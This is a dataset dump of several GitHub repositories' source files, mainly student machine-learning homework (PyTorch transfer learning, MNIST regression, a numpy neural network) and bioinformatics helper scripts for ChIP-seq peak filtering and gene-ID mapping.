args.gpu, num_epochs= args.num_epochs)\n #%%\n test_acc1 = eval_test_acc(model1, M, test_loader, gpu = args.gpu)\n report(\"A4a Transfer Learning\", log_train_loss1, log_val_loss1, log_val_acc1, test_acc1)\n elif args.model == 2:\n #%% Model2: Fine tuning\n model2 = models.alexnet(pretrained=True)\n model2.classifier[6] = nn.Linear(4096, 10)\n model2, log_train_loss2, log_val_loss2, log_val_acc2 = train(model2, train_loader, val_loader, split, gpu = args.gpu, num_epochs= args.num_epochs)\n test_acc2 = eval_test_acc(model2, M, test_loader, gpu = args.gpu)\n report(\"A4b fine tuning\", log_train_loss2, log_val_loss2, log_val_acc2, test_acc2)\n else:\n print(\"wrong model argument, it's either 1 or 2\")\n\n"
},
{
"alpha_fraction": 0.5877413749694824,
"alphanum_fraction": 0.5927791595458984,
"avg_line_length": 30.760000228881836,
"blob_id": "87eb21fbabb431ed838f2fe382ebaeed265c7c3b",
"content_id": "45b6e3ff035a0ffad98a0c99c473010533de2644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4764,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 150,
"path": "/hw4/a6_RNN/util.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "import torch\nfrom torch.utils.data import Dataset\n\nimport os\nimport pickle\nimport csv\n\nfrom collections import Counter\n\n\ndef load_embedding_matrix(vocab, glove_file_path=\"glove.6B.50d.txt\"):\n embedding_dim = -1\n\n embeddings = {}\n\n with open(glove_file_path, \"r\", encoding=\"utf8\") as f:\n for token_embedding in f.readlines():\n token, *embedding = token_embedding.strip().split(\" \")\n\n if token not in vocab:\n continue\n\n embedding = torch.tensor([float(e) for e in embedding], dtype=torch.float32)\n\n assert token not in embeddings\n assert embedding_dim < 0 or embedding_dim == len(embedding)\n\n embeddings[token] = embedding\n embedding_dim = len(embedding)\n\n all_embeddings = torch.stack(list(embeddings.values()), dim=0)\n\n embedding_mean = all_embeddings.mean()\n embedding_std = all_embeddings.std()\n\n # Randomly initialize embeddings\n embedding_matrix = torch.normal(embedding_mean, embedding_std, size=(len(vocab), embedding_dim))\n\n # Overwrite the embeddings we get from GloVe. The ones we don't find are left randomly initialized.\n for token, embedding in embeddings.items():\n embedding_matrix[vocab[token], :] = embedding\n\n # The padding token is explicitly initialized to 0.\n embedding_matrix[vocab[\"[pad]\"]] = 0\n\n return embedding_matrix\n\n\nclass SST2Dataset(Dataset):\n def __init__(self, path, vocab=None, reverse_vocab=None):\n super().__init__()\n\n sentences = []\n labels = []\n\n with open(path, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quoting=csv.QUOTE_NONE)\n next(reader) # Ignore header\n for row in reader:\n # Each row contains a sentence and label (either 0 or 1)\n sentence, label = row\n sentences.append(sentence.strip().split(\" \"))\n labels.append([int(label)])\n\n # Vocab maps tokens to indices\n if vocab is None:\n vocab = self._build_vocab(sentences)\n reverse_vocab = None\n\n # Reverse vocab maps indices to tokens\n if reverse_vocab is None:\n reverse_vocab = {index: token for token, index in vocab.items()}\n\n self.vocab = vocab\n self.reverse_vocab = reverse_vocab\n\n indexed_sentences = [torch.tensor(self.tokens_to_indices(sentence)) for sentence in sentences]\n labels = torch.tensor(labels)\n\n self.sentences = indexed_sentences\n self.labels = labels\n\n def __getitem__(self, index):\n return self.sentences[index], self.labels[index]\n\n def __len__(self):\n return len(self.sentences)\n\n @staticmethod\n def _build_vocab(sentences, unk_cutoff=1, vocab_file_path=\"vocab.pkl\"):\n # Load cached vocab if existent\n if os.path.exists(vocab_file_path):\n with open(vocab_file_path, \"rb\") as f:\n return pickle.load(f)\n\n word_counts = Counter()\n\n # Count unique words (lower case)\n for sentence in sentences:\n for token in sentence:\n word_counts[token.lower()] += 1\n\n # Special tokens: padding, beginning of sentence, end of sentence, and unknown word\n vocab = {\"[pad]\": 0, \"[unk]\": 1}\n token_id = 2\n\n # Assign a unique id to each word that occurs at least unk_cutoff number of times\n for token, count in word_counts.items():\n if count >= unk_cutoff:\n vocab[token] = token_id\n token_id += 1\n\n # Cache vocab\n with open(vocab_file_path, \"wb\") as f:\n pickle.dump(vocab, f, pickle.HIGHEST_PROTOCOL)\n\n return vocab\n\n def tokens_to_indices(self, tokens):\n \"\"\"\n Converts tokens to indices.\n :param tokens: A list of tokens (strings)\n :return: A tensor of shape (n, 1) containing the token indices\n \"\"\"\n indices = []\n\n unk_token = self.vocab[\"[unk]\"]\n\n for token in tokens:\n indices.append(self.vocab.get(token.lower(), unk_token))\n\n return torch.tensor(indices)\n\n def indices_to_tokens(self, indices):\n \"\"\"\n Converts indices to tokens and concatenates them as a string.\n :param indices: A tensor of indices of shape (n, 1), a list of (1, 1) tensors or a list of indices (ints)\n :return: The string containing tokens, concatenated by a space.\n \"\"\"\n tokens = []\n\n for index in indices:\n if torch.is_tensor(index):\n index = index.item()\n token = self.reverse_vocab.get(index, \"[unk]\")\n if token == \"[pad]\":\n continue\n tokens.append(token)\n\n return \" \".join(tokens)\n"
},
{
"alpha_fraction": 0.5821157097816467,
"alphanum_fraction": 0.6054938435554504,
"avg_line_length": 26.813007354736328,
"blob_id": "7d5badb02a9f8c4fd1a6123d6fa4659e9c40cf82",
"content_id": "6a68dd2ba5930e6d0df7c9a097573baed37511cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 123,
"path": "/CSE546hw2/multinomial_logistic_reg.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[101]:\n\n\nfrom mnist import MNIST\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom matplotlib import pyplot as plt\n\n\n# In[102]:\n\n\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train/255.0\n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\nX_train = torch.from_numpy(X_train).float().cuda()\ny_train = torch.from_numpy(labels_train).long().cuda()\nX_test = torch.from_numpy(X_test).float().cuda()\ny_test = torch.from_numpy(labels_test).long().cuda()\n\n\n# In[124]:\n\n\nn, d = X_train.shape\nm = X_test.shape[0]\n\n\n# In[125]:\n\n\ndef train(X_train, y_train, X_test, y_test, reg = None, step_size = 0.01, stop = 1e-4):\n class_rate_train_l = []\n class_rate_test_l = []\n epochs = 50\n W = torch.zeros(784, 10, device = 0 , requires_grad= True).float()\n# step_size = 0.01\n n = y_train.shape[0]\n k = 10 # number of classes\n y_train_onehot = torch.FloatTensor(n, k).zero_().cuda()\n y_train_onehot.scatter_(1, y_train.unsqueeze(-1).long(), 1)\n W_update = torch.tensor([1])\n with torch.cuda.device(0):\n while W_update > stop: # TODO: converge condition\n if reg == \"ridge\":\n y_hat = torch.matmul(X_train, W)\n criterion = torch.nn.MSELoss()\n loss = criterion(y_hat, y_train_onehot)\n elif reg == \"logistics\":\n y_hat = torch.matmul(X_train, W)\n loss = F.cross_entropy(y_hat, y_train)\n else:\n assert reg == None, \"needs regression type\"\n\n \n loss.backward()\n W.data = W.data - step_size * W.grad\n W_update = torch.norm(step_size * W.grad, p = 2)\n\n y_pred_train = torch.argmax(torch.matmul(X_train, torch.matmul(W, torch.eye(10).cuda())), axis = 1)\n y_pred_test = torch.argmax(torch.matmul(X_test, torch.matmul(W, torch.eye(10).cuda())), axis = 1)\n class_rate_train = torch.sum(y_pred_train ==y_train).item()/n\n class_rate_test = torch.sum(y_pred_test == y_test).item()/m\n class_rate_train_l.append(class_rate_train)\n class_rate_test_l.append(class_rate_test)\n # print(\"W.grad: \", W.grad)\n print(\"W_update: \", W_update)\n\n\n W.grad.zero_()\n return class_rate_train_l, class_rate_test_l\n\n\n# In[126]:\n\n\nclass_rate_train_l1, class_rate_test_l1 = train(X_train, y_train, X_test, y_test, reg = \"ridge\")\n\n\n# In[127]:\n\n\nclass_rate_train_l2, class_rate_test_l2 = train(X_train, y_train, X_test, y_test, reg = \"logistics\")\n\n\n# In[128]:\n\n\nclass_rate_train_l1\n\n\n# In[130]:\n\n\nxs = range(len(mis_class_rate_train_l1))\nplt.plot(xs, class_rate_train_l1, label = \"train\")\nplt.plot(xs, class_rate_test_l1, label= \"test\")\nplt.legend()\nplt.xlabel(\"number of iterations\")\nplt.ylabel(\"accuracy\")\nplt.title(\"ridge regression\")\nplt.savefig(\"B4c1\")\nplt.show()\n\n\nxs = range(len(mis_class_rate_train_l2))\nplt.plot(xs, class_rate_train_l2, label = \"train\")\nplt.plot(xs, class_rate_test_l2, label= \"test\")\nplt.xlabel(\"number of iterations\")\nplt.ylabel(\"accuracy\")\nplt.legend()\nplt.title(\"logistics regression\")\nplt.savefig(\"B4c2\")\nplt.show()\n\n"
},
{
"alpha_fraction": 0.625094473361969,
"alphanum_fraction": 0.6402116417884827,
"avg_line_length": 35.77777862548828,
"blob_id": "eaa5b31fe4c1d3b7610eac5dfb0f28e1e189aa68",
"content_id": "dd94a005ffc998d7cf4aecc9050ccaa9e0729538",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 36,
"path": "/hw1/ridgeRegression/imageClassify.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "from mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train/255.0\n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\ndef predict(w, x):\n predictions = np.eye(10).T.dot(w.T).dot(x.T)\n return predictions\n\n\n\n\ndef train(X, X_labels, reg_lambda = 0):\n # TODO: polyfeature + normalization?\n\n n = X.shape[1]\n Y = np.eye(10)[X_labels]\n w = np.linalg.pinv(X.T.dot(X) + np.multiply(reg_lambda, np.eye(n))).dot(X.T).dot(Y)\n # w = np.linalg.pinv(X.T.dot(X) + np.multiply(reg_lambda,np.eye(n)) ).dot(X.T).dot(Y)\n return w\n\n\nif __name__ == '__main__':\n X_train, labels_train, X_test, labels_test = load_dataset()\n reg_lambda = 1e-4\n w = train(X_train, labels_train, reg_lambda)\n prediction_train = predict(w, X_train)\n prediction_train = np.argmax(prediction_train, axis=0)\n print(\"Train error: \", 1-np.sum(labels_train == np.array(prediction_train))/len(labels_train))\n prediction_test = predict(w, X_test)\n prediction_test = np.argmax(prediction_test, axis=0)\n print(\"Test error: \", 1-np.sum(labels_test == np.array(prediction_test))/len(labels_test))"
}
] | 11 |
chrysaor/jw_mnist | https://github.com/chrysaor/jw_mnist | 75bd216b3dc2ae514eb6292ed4f7145e2f0dde91 | bf7af203b71ac3cc347ebc9cad2939d35e9811aa | 709362220f52c34c2cfde24b17c79f47dec42d81 | refs/heads/master | 2020-09-10T23:27:56.247688 | 2019-11-15T07:26:12 | 2019-11-15T07:26:12 | 221,864,959 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7068702578544617,
"alphanum_fraction": 0.7114503979682922,
"avg_line_length": 15.79487133026123,
"blob_id": "34fc3e333676d6510e7c8d24d9d7e004cd676d0b",
"content_id": "bef0a4fdfece370fa9f667f988f92d3701bbbedc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 39,
"path": "/README.md",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "# Neural network study example\n\n### Summary\n\nStudy example\n\n```\n$ !Download mnist train data from web site!\n$ cd jw_mnist\n$ python3 -m venv venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n$ jupyter notebook\n$ Load notebook file in notebook app\n```\n\n### Requirements\n\n- mnist_train data : https://pjreddie.com/media/files/mnist_train.csv\n- mnist_test data : https://pjreddie.com/media/files/mnist_test.csv\n- matplotlib : stable\n- numpy : stable\n- scipy : stable\n- jupyterlab : stable\n\n\n### Execution\n\n1. Move to source directory\n\n```\n$ cd neural_network\n```\n\n2. Execute jupyter notebook and load notebook file\n\n```\n$ jupyter notebook\n```\n"
},
{
"alpha_fraction": 0.5936749577522278,
"alphanum_fraction": 0.6036829352378845,
"avg_line_length": 33.21917724609375,
"blob_id": "ee6a14a1fa649cb2fac3507f2623b1110fc9bb5b",
"content_id": "1b9187010530722aabf1ca0ded81f09ead86b885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3136,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 73,
"path": "/neural_network/neural_network.py",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "import numpy\nimport scipy.special\n\n\n# 신경망 클래스 정의\nclass NeuralNetwork:\n\n # 신경망 초기화\n def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n # 입력, 은닉, 출력 계층의 노드 개수 설정\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # 가중치 행렬 wih, who\n # 배열 내 가중치는 w_i_j로 표기. 노드 i에서 다음 계층의 노드 j로 연결됨\n # w11 w21\n # w12 w22\n self.wih = numpy.random.normal(0.0, pow(self.hidden_nodes, -0.5), (self.hidden_nodes, self.input_nodes))\n self.who = numpy.random.normal(0.0, pow(self.output_nodes, -0.5), (self.output_nodes, self.hidden_nodes))\n\n # 학습률\n self.learning_rate = learning_rate\n\n # 활성화 함수로 시그모이드 함수를 이용\n self.activation_function = lambda x: scipy.special.expit(x)\n\n # 신경망 학습시키기\n def train(self, inputs_list, targets_list):\n # 입력 리스트를 2차원 행렬로 변환\n inputs = numpy.array(inputs_list, ndmin=2).T\n targets = numpy.array(targets_list, ndmin=2).T\n\n # 은닉 계층으로 들어오는 신호를 계산\n hidden_inputs = numpy.dot(self.wih, inputs)\n # 은닉 계층에서 나가는 신호를 계산\n hidden_outputs = self.activation_function(hidden_inputs)\n\n # 최종 출력 계층으로 들어오는 신호를 계산\n final_inputs = numpy.dot(self.who, hidden_outputs)\n # 최종 출력 계층에서 나가는 신호를 계산\n final_outputs = self.activation_function(final_inputs)\n\n # 오차는 (실제 값 - 계산 값)\n output_errors = targets - final_outputs\n # 은닉 계층의 오차는 가중치에 의해 나뉜 출력 계층의 오차들을 재조합해 계산\n hidden_errors = numpy.dot(self.who.T, output_errors)\n\n # 은닉 계층과 출력 계층 간의 가중치 업데이트\n self.who += self.learning_rate * numpy.dot(\n (output_errors * final_outputs * (1.0 - final_outputs)), numpy.transpose(hidden_outputs)\n )\n\n # 입력 계층과 은닉 계층 간의 가중치 업데이트\n self.wih += self.learning_rate * numpy.dot(\n (hidden_errors * hidden_outputs * (1.0 - hidden_outputs)), numpy.transpose(inputs)\n )\n\n # 신경망 질의하기\n def query(self, inputs_list):\n # 입력 리스트를 2차원 행렬로 변환\n inputs = numpy.array(inputs_list, ndmin=2).T\n\n # 은닉 계층으로 들어오는 신호를 계산\n hidden_inputs = numpy.dot(self.wih, inputs)\n # 은닉 계층으로 나가는 신호를 계산\n hidden_outputs = self.activation_function(hidden_inputs)\n # 최종 출력 계층으로 들어오는 신호를 계산\n final_inputs = numpy.dot(self.who, hidden_outputs)\n # 최종 출력 계층에서 나가는 신호를 계산\n final_outputs = self.activation_function(final_inputs)\n\n return final_outputs\n"
},
{
"alpha_fraction": 0.6561679840087891,
"alphanum_fraction": 0.6719160079956055,
"avg_line_length": 33.6363639831543,
"blob_id": "ddf063ee8b2f71cda992df0475137e32cf6843db",
"content_id": "fe9d887d75d5ca54ee4099a2cd2c5b6cab58d409",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 381,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 11,
"path": "/main.py",
"repo_name": "chrysaor/jw_mnist",
"src_encoding": "UTF-8",
"text": "import numpy\nimport matplotlib.pyplot\n\nif __name__ == 'main':\n train_data_file = open('mnist_data/mnist_train.csv', 'r')\n data_list = train_data_file.readlines()\n train_data_file.close()\n\n all_values = data_list[0].split(',')\n image_array = numpy.asfarray(all_values[1:]).reshape((28, 28))\n matplotlib.pyplot.imshow(image_array, cmap='Greys', interpolation=None)\n"
}
] | 3 |
cu-swe4s-fall-2019/version-control-jfgugel | https://github.com/cu-swe4s-fall-2019/version-control-jfgugel | 1b42b19695b265cee1191cef6fa1c244879f82ff | 38b1f0c8b04d66a0f10a06a05642a6965502ad72 | c54dbafa65ec30285fdc2a9fab088bd994a81b33 | refs/heads/master | 2020-07-14T02:11:53.531688 | 2019-09-05T18:04:23 | 2019-09-05T18:04:23 | 205,209,961 | 0 | 0 | MIT | 2019-08-29T16:52:45 | 2019-09-03T17:25:48 | 2019-09-05T18:04:24 | Python | [
{
"alpha_fraction": 0.42465752363204956,
"alphanum_fraction": 0.4452054798603058,
"avg_line_length": 15.11111068725586,
"blob_id": "718f61d1c0b4f795438ad546414ee409d7a19bfb",
"content_id": "4e7ea0b97174bd3962f3ab954adf8a54794a2590",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 9,
"path": "/math_lib.py",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "def div(a, b):\n if b==0:\n print (\"Can't divide by 0\")\n return 1\n else:\n return a/b\n \ndef add(a, b):\n return a+b\n\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 50.75,
"blob_id": "820cc6da7ec4a59474f58e86b503b95f1ac1312a",
"content_id": "030933296efa50417e036bb9055dcee23e8264ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 208,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 4,
"path": "/README.md",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "# version_control\nGet familiar with version control basics\nmath_lib.py has a function that allows you to divide one number by another and allows to add two numbers\ncalculate.py allows you to add two numbers \n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6785714030265808,
"avg_line_length": 10,
"blob_id": "fbfca69a931ea30248584ce73c4673dea1818c7f",
"content_id": "c166d2729b607ee3b3c8205fc2ac7f4f4785e27c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 5,
"path": "/run.sh",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nchmod -x run.sh\n\npython3 calculate.py 3 4\n\n"
},
{
"alpha_fraction": 0.6532109975814819,
"alphanum_fraction": 0.6642201542854309,
"avg_line_length": 26.299999237060547,
"blob_id": "337346df565ca6708e8579e36488e788ace4a6ed",
"content_id": "9921a03df46af81e55d90108d567df52c059c181",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 545,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 20,
"path": "/calculate.py",
"repo_name": "cu-swe4s-fall-2019/version-control-jfgugel",
"src_encoding": "UTF-8",
"text": "import math_lib as mathfunctions\nimport argparse\n\n\n\nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(description='take input from terminal') \n parser.add_argument('first_value', type=int, help='first integer to be added') \n parser.add_argument('second_value', type=int, help='second integer to be added')\n \n args = parser.parse_args()\n a= args.first_value\n b= args.second_value\n \n answer1 = mathfunctions.add(a,b)\n answer2 = mathfunctions.div(answer1,3)\n\n print(answer1)\n print(answer2)"
}
] | 4 |
drewUCL/DjangoPolls | https://github.com/drewUCL/DjangoPolls | 17293df98ba19ca5737234cd56ae32ef1c51bc6e | 7758d1cecb115e85017011423d19f1e3483c013f | 4f06701a5d7a4f09bc80eb1e15d3bcc7ca9d9c66 | refs/heads/master | 2021-01-10T12:18:52.791396 | 2016-01-25T15:32:32 | 2016-01-25T15:32:32 | 50,359,864 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5903890132904053,
"alphanum_fraction": 0.6075515151023865,
"avg_line_length": 30.25,
"blob_id": "b9a695015dbe95ea2ec5dce0c4e22766289d6f70",
"content_id": "db9dde5ae3d62341d4aed3d071182b1b14c9b9a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 874,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 28,
"path": "/polls/urls.py",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name='polls' #this allows reference like: <a href=\"{% url 'polls:detail' question.id %}\"> in the index.html (template)\n\n\n'''\nurlpatterns = [\n\t# ex: /polls/\n\turl(r'^$',views.index, name=\"index\"),\n\t# ex: /polls/5/\n\turl(r'^(?P<question_id>[0-9]+)/$',views.detail, name=\"detail\"),\n\t# ex: /polls/5/results\n\turl(r'^(?P<question_id>[0-9]+)/results/$', views.results, name='results'),\n\t# ex: /polls/5/vote\n\turl(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]\n'''\n\n#Now using the django generic templates\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^(?P<pk>[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]"
},
{
"alpha_fraction": 0.7273055911064148,
"alphanum_fraction": 0.735985517501831,
"avg_line_length": 30.375,
"blob_id": "5d2d4b89458ba5fccd37e09a2019bbedc93989f1",
"content_id": "2a058aa24f53218396683b9c416f4600e25e3dfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2765,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 88,
"path": "/polls/views.py",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404, render\n\n# Create your views here.\n\n#if using render we dont need to load HttpResponse\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\n#from django.template import loader\n#from django.http import Http404\nfrom django.views import generic\n\nfrom .models import Choice, Question\n\n\n'''\n\ndef index(request):\n\tlatest_question_list = Question.objects.order_by('-pub_date')[:5]\n\t#template used for the long way\n\t#template = loader.get_template('polls/index.html')\n\tcontext = {\n\t\t'latest_question_list': latest_question_list, \n\t}\n\treturn render(request, 'polls/index.html', context)\n\t#Long way below, shortcut above\n\t#return HttpResponse(template.render(context, request))\n\n\n#THIS IS THE LONG WAY\ndef detail(request, question_id):\n\ttry:\n\t\tquestion = Question.objects.get(pk=question_id)\n\texcept Question.DoesNowExist:\n\t\traise Http404(\"Question does not exist\")\n\treturn render(request, 'polls/detail.html',{'question':question})\n\t# Below the HttpResponse is used for the long response\n\t#return HttpResponse(\"You're looking at question %s.\" % question_id)\n\n\n#SHORT WAY FOR 404'S:\ndef detail(request, question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\treturn render(request, 'polls/detail.html', {'question':question})\n\ndef results(request, question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\treturn render(request, 'polls/results.html', {'question':question})\n\n'''\n\n#THE ABOVE IS THE HARD WAY - WE ARE NOW USING GENERIC TEMPLATES:\n\nclass IndexView(generic.ListView):\n template_name = 'polls/index.html'\n context_object_name = 'latest_question_list'\n\n def get_queryset(self):\n \"\"\"Return the last five published questions.\"\"\"\n return Question.objects.order_by('-pub_date')[:5]\n\n\nclass DetailView(generic.DetailView):\n model = Question\n template_name = 'polls/detail.html'\n\n\nclass ResultsView(generic.DetailView):\n model = Question\n template_name = 'polls/results.html'\n\n\ndef vote(request,question_id):\n\tquestion = get_object_or_404(Question, pk=question_id)\n\ttry:\n\t\tselected_choice = question.choice_set.get(pk=request.POST['choice'])\n\texcept (KeyError, Choice.DoesNotExist):\n\t\t#Redisplay the question voting form\n\t\treturn render(request, 'polls/detail.html', {\n\t\t\t'question':question,\n\t\t\t'error_message': \"You didn't select a choice.\"\n\t\t})\n\telse:\n\t\tselected_choice.votes += 1\n\t\tselected_choice.save()\n\t\t# Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button. BE CAREFUL TO INCLUDE THE COMMA IN ARGS\n\t\treturn HttpResponseRedirect(reverse('polls:results',args=(question.id,)))\n\t\t\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "d645b2af2f55518cbdc8089e7f28bf057d7910d4",
"content_id": "64d764bbeac52c61282f6a4aa897b91d217c6cad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/README.md",
"repo_name": "drewUCL/DjangoPolls",
"src_encoding": "UTF-8",
"text": "#Django Tutorial: Polls App\n"
}
] | 3 |
zhuyezhang/mycode-Shen | https://github.com/zhuyezhang/mycode-Shen | 2d49d955b748758cb4a54363d363dfcd9e3b06cf | b6d8d1274c61d2cb75eab9d56269457dcd3cb7e7 | 94ecd8c4f065e0063ffeb9f9ce25ba34a38269cb | refs/heads/master | 2019-02-26T03:14:42.376023 | 2017-09-05T11:34:05 | 2017-09-05T11:34:05 | 100,691,733 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5009074211120605,
"alphanum_fraction": 0.549909234046936,
"avg_line_length": 24.090909957885742,
"blob_id": "03c5b7b763eb97403ec75c7237a86f57186ded6e",
"content_id": "198e6acd87b24e9168215ae379eb12e3dfe84005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 551,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 22,
"path": "/batch_peak_filter_last",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 2 ];then\necho \"Need 2 parameters! <IP_sample> <peaklist>\"\nexit\nfi\n\nIP_sample=$1\npeakfile=$2\n\npaste ${IP_sample}.peaks.IP.rpkm.bdg ${IP_sample}.peaks.control.rpkm.bdg | awk -v OFS='\\t' '{\n if($8==\"0\") {\n ratio=10;dRPKM=$4\n } \n else {\n ratio=$4/$8;dRPKM=$4-$8\n }; \n if(ratio>2 && dRPKM>0.5 && $8<5) {print $1,$2,$3,ratio,dRPKM}\n}' > ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed\n\nwc -l ${peakfile}\nwc -l ${IP_sample}.ratio2.dRPKM0.5.filtered.uniq.peaks.bed"
},
{
"alpha_fraction": 0.5776965022087097,
"alphanum_fraction": 0.5923217535018921,
"avg_line_length": 30.22857093811035,
"blob_id": "82fbc0f475328dd84d7d541a5fb069e7fdc99b63",
"content_id": "38da61c22a4aa5b38222743a7b4c832258597ad1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1094,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 35,
"path": "/transcriptIDtoGeneSymbol",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
"text": "#!/nethome/yezhang_zhu/miniconda2/bin/python\n\nimport re\nimport sys\n\nif len(sys.argv)<5:\n print(\"Usage:transcriptIDtoGeneSymbol <refGene.gtf> <transcript_id.txt> <outfile> <transcript_id_col_num>\")\n exit(0)\n\ndicts={}\nwith open(sys.argv[1]) as infile:\n for line in infile.readlines():\n transcript_id=re.search(\"transcript_id \\\"(\\S+)\\\"\",line).group(1)\n genename=re.search(\"gene_name \\\"(\\S+)\\\"\",line).group(1)\n dicts[transcript_id]=genename\n\noutfile=open(sys.argv[3],'w')\nwith open(sys.argv[2]) as infile2:\n for i in infile2.readlines():\n i=i.strip()\n outline=i+'\\n'\n transcript_ids=i.split('\\t')[int(sys.argv[4])-1]\n i_f='\\t'.join(i.split('\\t')[0:int(sys.argv[4])])\n i_b='\\t'.join(i.split('\\t')[int(sys.argv[4]):])\n transcripts=transcript_ids.split(';')\n try:\n gene_names=';'.join([dicts[val] for val in transcripts if not val=='NONE'])\n outline=i_f+'\\t'+gene_names+'\\t'+i_b+'\\n'\n except:\n pass\n outfile.write(outline)\n\ninfile.close()\ninfile2.close()\noutfile.close()\n\n"
},
{
"alpha_fraction": 0.6278026700019836,
"alphanum_fraction": 0.6569506525993347,
"avg_line_length": 15.518518447875977,
"blob_id": "1c6f2be9cee9f8ea3d006ff9e8044898dc9be6ae",
"content_id": "c40eb5543be5a59abdcb094710f6934a1a7a69de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 27,
"path": "/trim",
"repo_name": "zhuyezhang/mycode-Shen",
"src_encoding": "UTF-8",
